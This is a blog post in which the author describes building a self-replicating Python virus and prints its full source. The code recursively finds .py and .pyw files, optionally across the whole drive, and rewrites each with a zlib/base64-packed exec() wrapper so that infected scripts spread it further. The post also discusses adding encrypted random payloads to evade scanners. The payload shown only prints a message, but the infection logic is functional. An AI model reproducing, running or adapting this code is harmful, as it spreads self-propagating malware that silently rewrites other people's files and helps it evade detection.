So I was sitting in a long and irrelevant meeting the other day and my thoughts started flickering in other directions. One question that came to mind was:

How hard would it be to write a self-replicating virus in Python? Not very hard, it turns out!

The idea

OK, so the idea was lit, and I fired up my good old trusty Vim editor (actually Neovim these days) and started coding away.

I wanted it to have the following features:

  • Self-replicating by injecting itself into other Python files on the system
  • Some sort of packing mechanism to make the code less obvious
  • The ability to still run the actual code of the original script (so the host script keeps working as before, even if the virus code is doing something bad in the background)
  • Potentially able to infect an entire system

Putting it all together

For the first part I decided to go with an easy method: adding markers to my code using simple begin and end tags, # MALPYIN and # MALPYOUT.

I could then just read the currently running Python script, scan the lines for where the code begins, and read everything into memory until I hit the end tag.

Now I can search for all .py and .pyw files in the current directory recursively (or potentially from the root of the file system). It turns out that searching the file system for multiple file extensions can be a bit tricky if you do not want to go over the entire system multiple times. I did find a solution that mostly works, but I am not 100% happy with it.
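One way to match several extensions in a single pass is to walk the tree once and test each file name against a set of suffixes. This is only a minimal sketch, not the approach used in the final code: `find_by_suffix` and `EXTENSIONS` are names made up for illustration, and the demo runs against a throwaway temporary directory.

```python
import os
import tempfile
from pathlib import Path

# Extensions to look for; the two mentioned above.
EXTENSIONS = {".py", ".pyw"}

def find_by_suffix(root, extensions=EXTENSIONS):
    """Yield every file under root whose suffix is in extensions, using one walk."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in extensions:
                yield Path(dirpath) / name

# Demo on a temporary directory so nothing outside it is touched.
with tempfile.TemporaryDirectory() as tmp:
    for rel in ("a.py", "b.pyw", "c.txt", "sub/d.py"):
        target = Path(tmp) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text("")
    found = sorted(p.relative_to(tmp).as_posix() for p in find_by_suffix(tmp))

print(found)  # ['a.py', 'b.pyw', 'sub/d.py']
```

Because the suffix test is a set lookup, adding more extensions does not add more passes over the file system.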

Finally, I needed a way to pack it. After some trial and error, I decided to go with a mix of zlib compression and base64 encoding. It makes the code quite hard to read, and if it weren’t for the begin/end tags, it would also add a bit of polymorphism to the whole thing (making it harder to write scripts that look for infected files).
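The zlib plus base64 combination is an encoding, not encryption, so it is fully reversible with the standard library. The round trip below is a small sketch on a harmless string; `pack` and `unpack` are illustrative names, and `unpack` only returns the text so it can be read, it never executes it.

```python
import base64
import zlib

def pack(text):
    """zlib-compress text, then base64-encode it to an ASCII string."""
    return base64.b64encode(zlib.compress(text.encode("utf-8"))).decode("ascii")

def unpack(blob):
    """Reverse pack(): base64-decode, decompress, decode to text. Nothing is executed."""
    return zlib.decompress(base64.b64decode(blob)).decode("utf-8")

sample = 'print("hello")\n'
blob = pack(sample)
restored = unpack(blob)

print(blob)                # opaque-looking ASCII text
print(restored == sample)  # True
```

Note that packing the same input twice gives the same blob, so anyone who finds a packed string can decode it for inspection the same way.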

In the end there were some details like not infecting already infected files, not packing the code multiple times, etc. that made the code grow a bit. These could be removed if I had not decided on the full feature set above.
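The "already infected" check boils down to looking for the begin tag on a line of its own, and the same test works as a simple read-only scanner. A minimal sketch, assuming the tag is exactly `# MALPYIN`; `has_marker` is a hypothetical helper and the demo files live in a temporary directory.

```python
import tempfile
from pathlib import Path

BEGIN_TAG = "# MALPYIN"

def has_marker(path):
    """Return True if any line of the file is exactly the begin tag. Read-only."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as f:
            return any(line.rstrip("\r\n") == BEGIN_TAG for line in f)
    except OSError:
        return False  # unreadable files are reported as unmarked

with tempfile.TemporaryDirectory() as tmp:
    clean = Path(tmp) / "clean.py"
    marked = Path(tmp) / "marked.py"
    clean.write_text("print('hi')\n")
    marked.write_text("# MALPYIN\nprint('hi')\n# MALPYOUT\n")
    results = (has_marker(clean), has_marker(marked))

print(results)  # (False, True)
```

This is also why the fixed tags undercut the packing: a plain line comparison is enough to find every marked file.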

The final code

Without further ado, this is the final code. I am sure it can be made simpler/prettier/whatever by folks who do a lot of Python coding and know how to optimize things.

You can set GLOBAL to True if you want it to infect all Python files on your system (I do NOT recommend that); otherwise it will just go for the files in the folder where you first ran it. If you run any of the infected Python scripts, they will try to infect other scripts as well, so please be sure you know what you are doing.

If you have any ideas, do let me know in the comments below.

# MALPYIN

# do we want to infect the entire filesystem?
GLOBAL = False

import os
import sys
from pathlib import Path
import re
import base64
import zlib

def packer(vsrc, osrc):
    """
    Really simple packer that zlib-compresses the virus source and the
    original source and then base64-encodes them.
    """
    vcomp = base64.b64encode(zlib.compress(vsrc.encode('utf-8'))).decode('utf-8')
    ocomp = base64.b64encode(zlib.compress(osrc.encode('utf-8'))).decode('utf-8')
    return f'# MALPYIN\n\nimport zlib,base64;\nexec(zlib.decompress(base64.b64decode("{vcomp}")));\n# MALPYOUT\n\nexec(zlib.decompress(base64.b64decode("{ocomp}")))'


# open the current file itself to copy the malware code (there might be other code)
malcode = []
with open(sys.argv[0], 'r') as f:
    lines = f.readlines()

found_malcode = False
for line in lines:
    if found_malcode:
        malcode.append(line)
    if line == "# MALPYIN\n":
        found_malcode = True
        continue
    if line == "# MALPYOUT\n":
        break

# unpack the malware code
if re.search(r'^exec\(\)', str(malcode)):
    print("found secondary infection")
    malcode_full = re.search(r'^exec.+\{(.*)\}',str(malcode))
    icode = zlib.decompress(base64.b64decode(malcode_full.group()))
    malcode.append(str(icode) +'\n')

# only infect files as configured for
if GLOBAL==True:
    fs_root = os.path.abspath('.').split(os.path.sep)[0]+os.path.sep
else:
    fs_root = '.'

# find all python files to infect
files = (p.resolve() for p in Path(fs_root).glob("**/*") if p.suffix in {".py", ".pyw"})

#infect all files if they are not already infected
for file in files:
    with open(file, 'r') as f:
        org = f.readlines()

    infected = False

    for line in org:
        if line == "# MALPYIN\n":
            infected = True
            break

    if not infected:
        with open(file, 'w') as f:
            f.writelines(packer(''.join(malcode),''.join(org)))

def malpy():
    print("If I were EV1L I would have D3S7R0Y3D your system here")

malpy()

# MALPYOUT

Limitations and further ideas

So the code will only run with Python 3, and it cannot tell whether it is infecting a Python 2 script (who has this old crap anyways?).

On Windows it only infects files on the current drive (e.g. C:\). This is probably good enough anyways.

The GLOBAL flag could be moved to an environment variable or similar. This could make it safe for you, but not for other systems.

I considered adding some sort of random payload to the packed data. This would make it even harder for scanners to detect. The payload could also serve as the marker, perhaps encrypted with a key that is part of the code. I haven’t fully figured out how that would work on huge systems, where it would have to do a lot of decryption in order to find already infected files.